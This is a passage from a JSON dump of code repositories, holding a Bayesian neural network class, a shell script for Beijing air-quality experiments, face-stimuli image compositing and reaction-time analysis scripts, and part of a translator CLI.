with SGD\n ######################################################################\n def calculate_gradient_sgd(self, data, w):\n self.decode(w) # method to decode w into W1, W2, B1, B2.\n size = data.shape[0]\n\n Input = np.zeros((1, self.input)) \n Desired = np.zeros((1, self.output))\n fx = np.zeros(size)\n\n for i in range(0, self.sgd_runs):\n for i in range(0, size):\n pat = i\n Input = data[pat, 0:self.input]\n Desired = data[pat, self.input:]\n self.forward_pass(Input)\n self.backward_pass(Input, Desired)\n\n w_updated = self.encode()\n return w_updated\n\n\n\n\n 
######################################################################\n # TAKE A SINGLE VECTOR OF FLOATING POINT NUMBERS AND USE IT TO \n # SET THE VALUES OF ALL WEIGHTS AND BIASES\n ######################################################################\n def decode(self, w):\n input_layer_wts = self.input * self.hidden\n output_layer_wts = self.hidden * self.output\n\n start_index = 0\n w_layer1 = w[start_index:input_layer_wts]\n self.W1 = np.reshape(w_layer1, (self.input, self.hidden))\n start_index = start_index + input_layer_wts\n\n self.B1 = w[start_index:start_index + self.hidden]\n start_index = start_index + self.hidden\n\n w_layer2 = w[start_index: start_index + output_layer_wts]\n self.W2 = np.reshape(w_layer2, (self.hidden, self.output))\n start_index = start_index + output_layer_wts\n\n self.B2 = w[start_index:start_index + self.output]\n start_index = start_index + self.output\n\n ######################################################################\n # ENCODE THE WEIGHTS AND BIASES INTO A SINGLE VECTOR \n ######################################################################\n def encode(self):\n w1 = self.W1.ravel()\n w2 = self.W2.ravel()\n w = np.concatenate([w1, self.B1, w2, self.B2])\n return w\n\n ######################################################################\n # PROCESS DATA\n # RUN A NUMBER OF EXAMPLES THROUGH THE NETWORK AND RETURN PREDICTIONS\n ######################################################################\n def process_data(self, data): \n size = data.shape[0]\n Input = np.zeros((1, self.input)) # temp hold input\n Desired = np.zeros((1, self.output))\n fx = np.zeros(size)\n for pat in range(0, size):\n Input[:] = data[pat, 0:self.input]\n Desired[:] = data[pat, self.input:]\n self.forward_pass(Input)\n fx[pat] = self.final_out\n return fx\n\n\n ######################################################################\n # EVALUATE PROPOSAL \n # THIS METHOD NEEDS TO SET THE WEIGHT PARAMETERS\n # THEN PASS THE SET OF DATA THROUGH, COLLECTING THE OUTPUT FROM EACH\n # OF THE BOOSTED LAYERS, AND THE FINAL OUTPUT\n ######################################################################\n def evaluate_proposal(self, data, w): \n self.decode(w)\n fx = self.process_data(data)\n y = data[:, self.input]\n feats = data[:, :self.input]\n metric = self.eval(fx, y, feats)\n return [fx, metric]\n\n\n ######################################################################\n # LOG LIKELIHOOD\n # CALCULATED GIVEN \n # - A PROPOSED SET OF WEIGHTS\n # - A DATA SET \n # - AND THE PARAMETERS FOR THE ERROR DISTRIBUTION\n ######################################################################\n def log_likelihood(self, data, w, tausq):\n y = data[:, self.input]\n [fx, rmse] = self.evaluate_proposal(data, w)\n loss = -0.5 * np.log(2 * math.pi * tausq) - 0.5 * np.square(y - fx) / tausq\n return np.sum(loss)\n\n\n ######################################################################\n # LOG PRIOR\n ######################################################################\n def log_prior(self, w, tausq):\n h = self.hidden # number hidden neurons\n d = self.input # number input neurons\n part1 = -1 * ((d * h + h + 2) / 2) * np.log(self.sigma_squared)\n part2 = 1 / (2 * self.sigma_squared) * (sum(np.square(w)))\n logp = part1 - part2 - (1 + self.nu_1) * np.log(tausq) - (self.nu_2 / tausq)\n return logp\n\n\n ######################################################################\n # GET THE COMPLETE LENGTH OF THE ENCODED WEIGHT VECTOR\n 
######################################################################\n    def get_weight_vector_length(self):\n        start_index = 0\n        input_layer_wts = self.input * self.hidden\n        output_layer_wts = self.hidden * self.output\n        start_index = start_index + input_layer_wts\n        start_index = start_index + self.hidden\n        start_index = start_index + output_layer_wts\n        start_index = start_index + self.output\n        return start_index\n\n\n\n    ######################################################################\n    # GET PROPOSAL TAU VALUE FOR ERROR DISTRIBUTION \n    ######################################################################\n    def get_proposal_tau(self, eta):\n        eta_pro = eta + np.random.normal(0, self.step_eta, 1)\n        tau_pro = math.exp(eta_pro)\n        return [eta_pro, tau_pro]\n\n\n    ######################################################################\n    # GET THE WEIGHT VECTOR\n    ######################################################################\n    def get_weight_vector(self):\n        mytemp = [self.get_weight_vector_length()]\n        return mytemp\n\n\n"
},
{
"alpha_fraction": 0.7151300311088562,
"alphanum_fraction": 0.7742316722869873,
"avg_line_length": 83.5,
"blob_id": "4053082c33a2f3b2a66648063c6ad795c4eff7e8",
"content_id": "83cc620825bdcae4125c3e6980bf8f6ab4b9e35e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 846,
"license_type": "no_license",
"max_line_length": 311,
"num_lines": 10,
"path": "/experiments/RUN_BeiJing_24hr_LangevinFFNN.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n\npython3 ./train_bn_mcmc.py 53 20 1 0 LangevinFFNN sigmoid data/Beijing/sets/Train_24_hour_norm.csv data/Beijing/sets/Test_24_hour_norm.csv results/Beijing_24Hr_LvnFFNN_Sigmoid/ MASE 10000\n\n# PROCESS THE RESULTS SO THAT THEY ARE IN THE TARGET SPACE (DEAL WITH NORMALISED OR DIFFERENCED TARGETS)\n \npython3 ./transform_test_results.py \"./results/Beijing_24Hr_LvnFFNN_Sigmoid/test_predictions_final.tsv\" \"./results/Beijing_24Hr_LvnFFNN_Sigmoid/test_predictions.tsv\" \"./data/Beijing/sets/Test_24_hour_full.csv\" \"data/Beijing/sets/Target_24_nzr_config.yaml\" True False False False \"TARGET_pm2.5_24_VALUE\" \"pm2.5\" \n\npython3 analyse_test_results.py \"./results/Beijing_24Hr_LvnFFNN_Sigmoid\" \"./results/Beijing_24Hr_LvnFFNN_Sigmoid/test_predictions_final.tsv\" \"./data/Beijing/sets/Test_24_hour_full.csv\" 5000 \"TARGET_pm2.5_24_VALUE\" \"pm2.5\"\n\n"
},
{
"alpha_fraction": 0.42352941632270813,
"alphanum_fraction": 0.42352941632270813,
"avg_line_length": 40.5,
"blob_id": "aeba2633bc6b76a2ef6ebc7fbd885d9cd5e0c8fc",
"content_id": "46d55a458e0a7548bdb19f3e993c21e3c2a1c343",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 85,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 2,
"path": "/data/Beijing/sets/README.md",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "PLACEHOLDER DIRECTORY FOR PROCESSED DATA\n-----------------------------------------\n \n"
}
] | 41 |
almasi771/face_stimuli | https://github.com/almasi771/face_stimuli | b2f6fcbc4a056a7f2fefc220dea81ca957138bad | 8ccda16034168533fbd76aecec21492e2c93b3bb | a083a09322be75cfdbfd852705a803106997c2a4 | refs/heads/master | 2020-06-04T09:11:33.726362 | 2014-04-09T18:50:57 | 2014-04-09T18:50:57 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6481963396072388,
"alphanum_fraction": 0.6623280048370361,
"avg_line_length": 25.633663177490234,
"blob_id": "f1591e8b948d992d58ca6fc83a268dda7454e17e",
"content_id": "77e8a9bb3e8dde04d3b4d6703fd5c6b75c7eeae8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2689,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 101,
"path": "/internal_testing.py",
"repo_name": "almasi771/face_stimuli",
"src_encoding": "UTF-8",
"text": "import os\nfrom datetime import datetime\nimport smtplib\n\ndef txt_time(start_time, user, pswd, from_user, txt_num):\n end_time = datetime.now() - start_time\n server=smtplib.SMTP('smtp.gmail.com:587')\n server.starttls()\n server.login(user,pswd)\n msg = \"Running time for EyeMask: \"+str(end_time)\n server.sendmail(from_user, txt_num, msg)\n\ndef pregen(f):\n\toutdir = '/Users/almaskebekbayev/Documents/research/internal_testing/internal_out/'\n\tfor i in xrange(len(f)):\n\t\tfor j in xrange(len(f)):\n\t\t\tif f[i] != f[j]:\n\t\t\t\tbash_command = \"convert \"+str(f[i])+\" \"+str(f[j])+\" EyeMask.jpg -composite \"+outdir+str(f[i])+'+'+str(f[j])+\"+EyeMask.jpg\"\n\t\t\t\tos.system(bash_command)\n\ndef main():\n\tf = []\n\tdir = '/Users/almaskebekbayev/Documents/research/internal_testing'\n\tfor dirpath, subdirs,filenames in os.walk(dir):\n\t\tfor i in filenames:\n\t\t\tif i.endswith(\".jpg\"):\n\t\t\t\tif i != 'EyeMask.jpg':\n\t\t\t\t\tf.append(i)\n\t#pregen(f)\n\n\tinternal_eyes = f[:8]\n\tinternal_faces = list(internal_eyes)\n\n\tfor j in xrange(1):\n\t\tfirst = internal_faces[0]\n\t\tinternal_faces = internal_faces[1:]\n\t\tinternal_faces.append(first)\n\n\t#myfile = open('participant_001.txt', 'w')\t\n\ttemp = []\n\tfor i in xrange(len(internal_eyes)):\n\t\ttemp.append(internal_eyes[i])\n\t\ttemp.append(internal_faces[i])\n\n\t#for ii in temp:\n\t#\tmyfile.write(\"%s\\n\" % ii)\n\n\texternal_eyes = f[8:16]\n\texternal_faces = list(external_eyes)\n\n\tfor l in xrange(1):\n\t\tfirst = external_faces[0]\n\t\texternal_faces = external_faces[1:]\n\t\texternal_faces.append(first)\n\n\tll = []\n\tfor jj in xrange(len(external_eyes)):\n\t\tll.append(external_eyes[jj])\n\t\tll.append(external_faces[jj])\n\n\t#for k in ll:\n\t#\tmyfile.write(\"%s\\n\" % k)\n\n\thigh_internal_eyes = f[16:24]\n\thigh_internal_faces = list(high_internal_eyes)\n\n\tss = []\n\tfor i in range(len(high_internal_eyes)):\n\t\tfor j in range(len(high_internal_faces)):\n\t\t\tif high_internal_eyes[i] != high_internal_faces[j]:\n\t\t\t\tss.append(high_internal_eyes[i])\n\t\t\t\tss.append(high_internal_faces[j])\n\t#print \"size of high internal combination is:\", len(ss)/2, 'not 48'\n\n\thigh_external_eyes = f[24:32]\n\thigh_external_faces = list(high_external_eyes)\n\n\t#same issue not 48, but 56\n\tkk = []\n\tfor i in range(len(high_external_eyes)):\n\t\tfor j in range(len(high_external_faces)):\n\t\t\tif high_external_eyes[i] != high_external_faces[j]:\n\t\t\t\tkk.append(high_internal_eyes[i])\n\t\t\t\tkk.append(high_external_faces[j])\n\n\toldLowInternal = temp[:8]\n\toldLowExternal = ll[:8]\n\toldHighInternal = ss[:56]\n\toldHighExternal = kk[:56]\n\tnewLowInternal = temp[8:]\n\n\nif __name__=='__main__':\n\tstart_time = datetime.now()\n\tmain()\n\tuser = ''\n\tpswd = ''\n\tfrom_user = ''\n\tto_user = ''\n\ttxt_num = '@tmomail.net'\n\t#txt_time(start_time, user, pswd, from_user, txt_num)"
},
{
"alpha_fraction": 0.6009286046028137,
"alphanum_fraction": 0.6283439993858337,
"avg_line_length": 30.193103790283203,
"blob_id": "59006bc430d44a28a1ff4663fc24303a21979868",
"content_id": "6687116b8d15bb2ba1cedb6c388a88a624eca69a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4523,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 145,
"path": "/stim_analysis.py",
"repo_name": "almasi771/face_stimuli",
"src_encoding": "UTF-8",
"text": "import csv\nimport pandas as pd\nfrom pandas import DataFrame\n\n#returns median number both for even or odd list\ndef median(time_list):\n\tsorts = sorted(time_list)\n\tlength = len(sorts)\n\tif not length%2:\n\t\treturn (sorts[length/2] + sorts[length/2-1]) / float(2)\n\treturn sorts[length/2]\n\ndef confusion_matrix(df_list, fan, status):\n\t#matrix: [[TP, FN], [FP, TN]]\n\ttp_time = []\n\ttn_time = []\n\tmatrix = [[0,0],[0,0]]\n\tfor i in df_list:\n\t\tif i[1] == 'yes-test':\n\t\t\tif i[4] == fan and i[5] == status:\n\t\t\t\tif i[3] == i[6]:\n\t\t\t\t\t#TP\n\t\t\t\t\tmatrix[0][0] += 1 \n\t\t\t\t\t#adding tp_time to the list\n\t\t\t\t\ttp_time.append(i[2])\n\t\t\t\telse:\n\t\t\t\t\t#FP\n\t\t\t\t\tmatrix[1][0] += 1\n\t\tif i[1] == 'no-test':\n\t\t\tif i[4] == fan and i[5] == status:\n\t\t\t\tif i[3] == i[6]:\n\t\t\t\t\t#TN\n\t\t\t\t\tmatrix[1][1] += 1\n\t\t\t\t\t#addting tn_time to the list\n\t\t\t\t\ttn_time.append(i[2])\n\t\t\t\telse:\n\t\t\t\t\t#FN\n\t\t\t\t\tmatrix[0][1] += 1\n\n\tif fan == 'lf':\n\t\tif status == 'ls':\t\t\n\t\t\tfinal = [\n\t\t\t\t\tfloat(matrix[0][0])/4, \n\t\t\t\t\tfloat(matrix[1][0])/4,\n\t\t\t\t\tmedian(tp_time), #median RTs for TP times\n\t\t\t\t\tmedian(tn_time) #median RTs for TN times\n\t\t\t\t\t]\n\t\telse:\n\t\t\tfinal = [\n\t\t\t\t\tfloat(matrix[0][0])/4, \n\t\t\t\t\tfloat(matrix[1][0])/4,\n\t\t\t\t\tmedian(tp_time), #median RTs\n\t\t\t\t\tmedian(tn_time) #median RTs\n\t\t\t\t\t]\n\tif fan == 'hf':\n\t\tif status == 'hs':\n\t\t\tfinal = [\n\t\t\t\t\tfloat(matrix[0][0])/24, \n\t\t\t\t\tfloat(matrix[1][0])/24,\n\t\t\t\t\tmedian(tp_time), #median RTs\n\t\t\t\t\tmedian(tn_time) #median RTs\n\t\t\t\t\t]\n\t\t\t\n\t\telse:\n\t\t\tfinal = [\n\t\t\t\t\tfloat(matrix[0][0])/24, \n\t\t\t\t\tfloat(matrix[1][0])/24,\n\t\t\t\t\tmedian(tp_time), #median RTs\n\t\t\t\t\tmedian(tn_time) #median RTs\n\t\t\t\t\t]\n\n\t#returns final, total TPs, total FPs\n\treturn final, matrix[0][0], matrix[1][0]\n\t\ndef conversion(hf_data):\n\tfinal_test = []\n\tfor x in hf_data:\n\t\tif x[1] == 'hf' and x[6] == 'old':\n\t\t\tx[6] = 'new'\n\t\t\tfinal_test.append(x[6])\n\t\telif x[1] == 'hf' and x[6] == 'new':\n\t\t\tx[6] = 'old'\n\t\t\tfinal_test.append(x[6])\n\t\telse:\n\t\t\tfinal_test.append(x[6])\n\treturn final_test\n\ndef main():\n\t#NOTE: PATH NEEDS TO BE CHANGED!!!\n\t#subject's data\n\tsubject_data = list(csv.reader(open('/path/to/<name>.txt','rb'), delimiter='\\t'))\n\t#master data\n\tmaster_test = DataFrame(pd.read_csv('/path/to/<name>/master-test.csv'))\n\n\t#only TEST data\n\t\"\"\"\n\tBased on subject's csv the df_data is:\n\tdf_data = DataFrame(subject_data[2028:2473:4])\n\tor \n\tdf_data = DataFrame(subject_data[2029:2474:4])]\n\t\"\"\"\n\tdf_data = DataFrame(subject_data[2028:2473:4])\n\n\t#remaining cols: 5,6,11 \n\tdf_data = df_data.drop([x for x in range(13) if x not in (5,6,11)], axis=1)\n\tcols = ['occupation', 'test_resp', 'time']\n\tdf_data.columns = cols\n\t\n\t#parsing occupation data. 
NOTE: bus driver is shown as 'bus'\n\tdf_data['occupation'] = [x.split()[2].replace(\")\",\"\") for x in df_data['occupation'].values.tolist()]\n\n\t#replacing yes-test and no-test values with old and new accordingly -> for later comparison\n\tdf_data['test_resp_cmp'] = [x.replace(\"yes-test\", \"old\") for x in df_data['test_resp'].values.tolist()]\n\tdf_data['test_resp_cmp'] = [x.replace(\"no-test\", \"new\") for x in df_data['test_resp_cmp'].values.tolist()]\n\n\t#RTs - 250 due to cue timing\n\tdf_data['time'] = [int(x)-250 for x in df_data['time'].values.tolist()]\n\n\t#adding master data\n\tdf_data['fan'] = master_test['fan']\n\tdf_data['status'] = master_test['status']\n\n\t#conversion: old -> new, new -> old\n\tdf_data['master_test'] = conversion(master_test.values.tolist())\n\n\t#output [HighStatusLFHits, HighStatusLFFAs, HighStatusLFHitsRTs, HighStatusLFCRsRTs]\n\thslf_data, hslf_tp_total, hslf_fp_total = confusion_matrix(df_list=df_data.values.tolist(), status='hs', fan='lf')\n\n\t#output: [HighStatusHFHits, HighStatusHFFAs, HighStatusHFHitsRTs, HighStatusHFCRsRTs]\n\thshf_data, hshf_tp_total, hshf_fp_total = confusion_matrix(df_list=df_data.values.tolist(), status='hs', fan='hf')\n\t#print hshf_tp_total, hshf_fp_total\n\n\t#output: [LowStatusLFHits, LowStatusLFFAs, LowStatusLFHitsRTs, LowStatusLFCRsRTs]\n\tlslf_data, lslf_tp_total, lslf_fp_total = confusion_matrix(df_list=df_data.values.tolist(), status='ls', fan='lf')\n\n\t#output: [LowStatusHFHits, LowStatusHFFAs, LowStatusHFHitsRTs, LowStatusHFCRsRTs]\n\tlshf_data, lshf_tp_total, lshf_fp_total = confusion_matrix(df_list=df_data.values.tolist(), status='ls', fan='hf')\n\n\tout = csv.writer(open('path/to/<name>.csv', 'w'), delimiter=',')\n\tout.writerow(sum([hslf_data,hshf_data,lslf_data,lshf_data, \n\t\t[(hslf_tp_total+hshf_tp_total+lslf_tp_total+lshf_tp_total)/float(56)], #total TPs\n\t\t[(hslf_fp_total+hshf_fp_total+lslf_fp_total+lshf_fp_total)/float(56)]], [])) #total FPs\n\t\nif __name__ == '__main__': \n\tmain()\n"
},
{
"alpha_fraction": 0.5051020383834839,
"alphanum_fraction": 0.5051020383834839,
"avg_line_length": 31.66666603088379,
"blob_id": "e2a20f56cb16fccf6d346db89d86b2340d335812",
"content_id": "9536d6c1f5739cdca9ea872a44f03a601fcaef4e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 588,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 18,
"path": "/pregen.py",
"repo_name": "almasi771/face_stimuli",
"src_encoding": "UTF-8",
"text": "import os\nimport re\n\ndef pregen(dir='.', mask='EyeMask.jpg'):\n os.chdir(dir)\n if not os.path.exists('out'):\n os.makedirs('out')\n files = [f for f in os.listdir('.') if f.endswith('.jpg') and not f.endswith('Mask.jpg') and not f.startswith('.')]\n for a in files:\n for b in files:\n if a != b:\n out = 'out/%s+%s+%s.jpg' % (a, b, mask)\n print 'compositing', out\n bash_command = \"convert %s %s %s -composite %s\" % (a, b, mask, out)\n os.system(bash_command)\n\nif __name__=='__main__':\n pregen()\n"
},
{
"alpha_fraction": 0.6749116778373718,
"alphanum_fraction": 0.6837455630302429,
"avg_line_length": 22.375,
"blob_id": "7ca40eb32fba2eac071cb0835229a48d560e0cd7",
"content_id": "be642fae4425c8bbd9deeb322cfd9877eb8cf819",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 566,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 24,
"path": "/stimuli_test.py",
"repo_name": "almasi771/face_stimuli",
"src_encoding": "UTF-8",
"text": "from PIL import Image\n\n\"\"\"\ninstructions:\nconvert image.png -transparent white imageResult.png\n\ntasks to implement:\n1) loop through images and apply funcOne & funcTwo\n\"\"\"\ndef funcHead():\n\timage = 'test_face.png'\n\talpha_mask = 'test_mask.png'\n\tmsk = Image.open(alpha_mask)\n\timg = Image.open(image)\n\timg.paste(msk, (0,0), msk)\n\timg.save('test_result_head.png', 'PNG')\n\ndef funcEyes():\n\timage = 'test_face.png'\n\talpha_mask = 'test_eyes.png'\n\tmsk = Image.open(alpha_mask)\n\timg = Image.open(image)\n\timg.paste(msk, (0,0), msk)\n\timg.save('test_result_eyes.png', 'PNG')\n\n\n\n\t\t"
},
{
"alpha_fraction": 0.5428897142410278,
"alphanum_fraction": 0.56939297914505,
"avg_line_length": 26.629920959472656,
"blob_id": "118640281173621ffbaa111d8a313a4ad5651188",
"content_id": "6ed4b24d002286fad8caa11a7392c1497315900e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3509,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 127,
"path": "/stim_analysis_two.py",
"repo_name": "almasi771/face_stimuli",
"src_encoding": "UTF-8",
"text": "import csv\nimport pandas as pd\nfrom pandas import DataFrame\n\n#returns median number both for even or odd list\ndef median(time_list):\n\ttime_list = [int(i) for i in time_list]\n\tsorts = sorted(time_list) #convert a list of str to floats or ints\n\tlength = len(sorts)\n\tif not length%2:\n\t\treturn (sorts[length/2] + sorts[length/2-1]) / float(2)\n\treturn sorts[length/2]\n\ndef confusion_matrix(df_list, fan, age):\n\t# applied confusion matrix to given termins\n\t# ------------------------\n\t# | TP -> hits | FN |\n\t# ------------------------\n\t# | FP -> Fas | TN -> CRs |\n\t# ------------------------\n\n\t# structure of 2d list\n\t#[[TP, FN],[FP, TN]]\n\n\ttp_time = []\n\tfp_time = []\n\ttn_time = []\n\tmatrix = [[0,0],[0,0]]\n\n\tfor i in df_list:\n\t\tif i[0] == \"j\":\n\t\t\tif i[3] == fan and i[4] == age:\n\t\t\t\tif i[2] == i[5]:\n\t\t\t\t\t#TP\n\t\t\t\t\tmatrix[0][0] += 1\n\t\t\t\t\ttp_time.append(i[1])\n\t\t\t\telse:\n\t\t\t\t\t#FP\n\t\t\t\t\tmatrix[1][0] += 1\n\t\t\t\t\tfp_time.append(i[1])\n\n\t\tif i[0] == \"k\":\n\t\t\tif[3] == fan and i[4] == age:\n\t\t\t\tif i[2] == i[5]:\n\t\t\t\t\t#TN\n\t\t\t\t\tmatrix[1][1] += 1\n\t\t\t\t\ttn_time.append(i[1])\n\t\t\t\telse:\n\t\t\t\t\t#FN\n\t\t\t\t\tmatrix[0][1] += 1\n\t\n\tif fan == 'lf':\n\t\tif age == 'young':\n\t\t\tfinal = [\n\t\t\t\t\t\tfloat(matrix[0][0])/12,\n\t\t\t\t\t\tfloat(matrix[1][0])/12,\n\t\t\t\t\t\tmedian(tp_time),\n\t\t\t\t\t\t0#median(tn_time)\n\t\t\t\t\t]\n\t\telse:\n\t\t\tfinal = [\n\t\t\t\t\t\tfloat(matrix[0][0])/12,\n\t\t\t\t\t\tfloat(matrix[1][0])/12,\n\t\t\t\t\t\tmedian(tp_time),\n\t\t\t\t\t\t0#median(tn_time)\n\t\t\t\t\t]\n\tif fan == 'hf':\n\t\tif age == 'older':\n\t\t\tfinal = [\n\t\t\t\t\t\tfloat(matrix[0][0])/12,\n\t\t\t\t\t\tfloat(matrix[1][0])/12, \n\t\t\t\t\t\tmedian(tp_time),\n\t\t\t\t\t\t0#median(tn_time)\n\t\t\t\t\t]\n\t\telse:\n\t\t\tfinal = [\n\t\t\t\t\t\tfloat(matrix[0][0])/12,\n\t\t\t\t\t\tfloat(matrix[1][0])/12,\n\t\t\t\t\t\tmedian(tp_time),\n\t\t\t\t\t\t0#median(tn_time)\n\t\t\t\t\t]\t\n\t\n\t#final, TP, FP\n\treturn final, matrix[0][0], matrix[1][0]\n\ndef main():\n\t#subject's data\n\tsubject_data = list(csv.reader(open('/path/to/<file>.txt', 'rb'), delimiter='\\t'))\n\n\t#master data\n\tmaster_test = DataFrame(pd.read_csv('/path/to/<file>.csv'))\n\n\tdf_data = DataFrame(subject_data[584:775:2])\n\n\tdf_data = df_data.drop([x for x in range(13) if x not in (7,11)], axis=1)\n\tcols = ['resp', 'time']\n\tdf_data.columns = cols \n\n\t#j -> yes, k -> no\n\tdf_data['resp_cmp'] = [x.replace('j', 'old') for x in df_data['resp'].values.tolist()]\n\tdf_data['resp_cmp'] = [x.replace('k', 'new') for x in df_data['resp_cmp'].values.tolist()]\n\n\tdf_data['fan'] = master_test['fan']\n\tdf_data['status'] = master_test['age']\n\tdf_data['correct_test'] = master_test['test']\n\n\tyoung_hf_data, young_hf_tp_total, young_hf_fp_total = confusion_matrix(df_list=df_data.values.tolist(), fan='hf', age='young')\n\n\t\n\tyoung_lf_data, young_lf_tp_total, young_lf_fp_total = confusion_matrix(df_list=df_data.values.tolist(), fan='lf', age='young')\n\tyoung_hf_data, young_hf_tp_total, young_hf_fp_total = confusion_matrix(df_list=df_data.values.tolist(), fan='hf', age='young')\n\n\tolder_lf_data, older_lf_tp_total, older_lf_fp_total = confusion_matrix(df_list=df_data.values.tolist(), fan='lf', age='older')\n\tolder_hf_data, older_hf_tp_total, older_hf_fp_total = confusion_matrix(df_list=df_data.values.tolist(), fan='hf', age='older')\n\n\tout = csv.writer(open('/path/to/output/<file>.csv', 'w'), 
delimiter=',')\n\t\n\tout.writerow(\n\t\tsum(\n\t\t\t[young_lf_data, young_hf_data, older_lf_data, older_hf_data,\n\t\t\t\t[(young_lf_tp_total + young_hf_tp_total + older_lf_tp_total + older_hf_tp_total)/float(48)],\n\t\t\t\t[(young_lf_fp_total + young_hf_fp_total + older_lf_fp_total + older_hf_fp_total)/float(48)]\n\t\t\t], [])\n\t) \n\t\nif __name__ == '__main__':\n\tmain()\n"
}
] | 5 |
carlosviol/dj-kickstart | https://github.com/carlosviol/dj-kickstart | 6b0f2728a96c9dfee7d28ffe9319dae2ccf1c5cd | 030825c012e3e830be0beb0d1b73d3bc1d92edd5 | 1e50a3d08d69340bcbffbf4ea3e4a9375c79c622 | refs/heads/master | 2021-01-17T07:17:44.562998 | 2014-12-04T16:58:30 | 2014-12-04T20:56:00 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.532951295375824,
"alphanum_fraction": 0.7020057439804077,
"avg_line_length": 16.450000762939453,
"blob_id": "4f57bedab30c0c98093b2e8e56519ce43247ada1",
"content_id": "e1d95624e60a4a1884c52b29c177b3be03de87ee",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 349,
"license_type": "permissive",
"max_line_length": 24,
"num_lines": 20,
"path": "/requirements.txt",
"repo_name": "carlosviol/dj-kickstart",
"src_encoding": "UTF-8",
"text": "Django==1.7.1\nUnipath==1.0\ndj-database-url==0.3.0\ndj-static==0.0.6\ngunicorn==19.1.0\npsycopg2==2.5.1\npython-decouple==2.2\ndjango-reversion==1.8\ndjango_extensions==1.3.3\nWerkzeug==0.9.6\nipython==2.1.0\ndjango-jenkins==0.14.1\nclonedigger==1.1.0\ncoverage==3.7.1\nflake8==2.1.0\ndjango-nose==1.2\nnose==1.3.0\nnosexcover==1.0.8\npylint==1.1.0\nmodel-mommy==1.2\n"
},
{
"alpha_fraction": 0.734375,
"alphanum_fraction": 0.75,
"avg_line_length": 63,
"blob_id": "235e28ff47bacaa147846f3ef6fca4cffbb4159b",
"content_id": "d4a7c56abaa54d3689a7778c174fd79cb49a2dbd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 64,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 1,
"path": "/reports/README.txt",
"repo_name": "carlosviol/dj-kickstart",
"src_encoding": "UTF-8",
"text": "Reports made by quality analyzers, like as nose, pep8, flake...\n"
},
{
"alpha_fraction": 0.7226890921592712,
"alphanum_fraction": 0.7310924530029297,
"avg_line_length": 18.83333396911621,
"blob_id": "8e28bf1fe7c2b735f42dddb2cb29a79a990774c6",
"content_id": "d842db45d28cbbc47b08595b7eb5ecb80abebe7e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 119,
"license_type": "permissive",
"max_line_length": 44,
"num_lines": 6,
"path": "/project_name/core/views.py",
"repo_name": "carlosviol/dj-kickstart",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nfrom django.shortcuts import render\n\n\ndef index(request):\n return render(request, 'core/base.html')\n"
}
] | 3 |
rassool-ahad/maktab52-group2 | https://github.com/rassool-ahad/maktab52-group2 | c03591e7333b7ffeec050ab21b76f0f84258195e | 2771c05547b30e345b045422e50fee57ced10b6f | 52ce5911fd6d7474407753fac8730a973f21a502 | refs/heads/master | 2023-05-10T11:03:43.812074 | 2021-06-04T13:35:35 | 2021-06-04T13:35:35 | 361,868,996 | 1 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.5484962463378906,
"alphanum_fraction": 0.5518797039985657,
"avg_line_length": 38.68656539916992,
"blob_id": "aa933054b256fa72c93d5ace21cb523d857e1d77",
"content_id": "ae684509b1a04c0328b9692ba5b0752a4cd05e3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2660,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 67,
"path": "/Translators/main.py",
"repo_name": "rassool-ahad/maktab52-group2",
"src_encoding": "UTF-8",
"text": "\nfrom models.exceptions import *\n\ndef main():\n file_cashe = {}\n print('Welcome to my Translator ^_^')\n while True:\n command = input('\\n1.Translate New File\\n2.Translate Previous File\\n3.Save Translation\\n4.Exit\\n>>> ')\n if command == '1':\n path = input('\\n\\t<Open New File>\\n~$ ')\n if path in file_cashe:\n logging.warning('File Already has Read...')\n else:\n new_file = Translation(path)\n if new_file: file_cashe[path] = new_file\n\n elif command == '2':\n print('\\n\\t<Translating>\\nList of Files:', *file_cashe.keys(), sep = '\\n')\n path = input('\\n~$ ')\n try:\n file_cashe[path]\n except KeyError:\n logging.error('No File Match Search...')\n else:\n language = input('What Target Language Translation?(Enter for Persian) ').lower()[: 2] or 'fa'\n file_cashe[path].process(target_language = language)\n logging.debug('Successfully Translate.')\n\n elif command == '3':\n print('\\n\\t<Saving File Translate>\\nList of Files:', *file_cashe.keys(), sep='\\n')\n path = input('\\n~$ ')\n try:\n file_cashe[path]\n except KeyError:\n logging.error('No File Match Search...')\n else:\n name = input('Please Enter Your File Name: ')\n file_cashe[path].save_file(name)\n\n elif command == '4':\n logging.warning('Close Program.')\n break\n\n else:\n logging.error('Invalid Input! Try Again...')\n\nimport argparse, os\nparser = argparse.ArgumentParser(description = 'Translator')\nparser.add_argument('text', metavar = 'PATH', action = 'store', type = str, default = \"\", nargs='?',help = 'Path File')\nparser.add_argument('-t', '--to_lang', metavar='TO LANGUAGE', action='store', required= True, type=str, 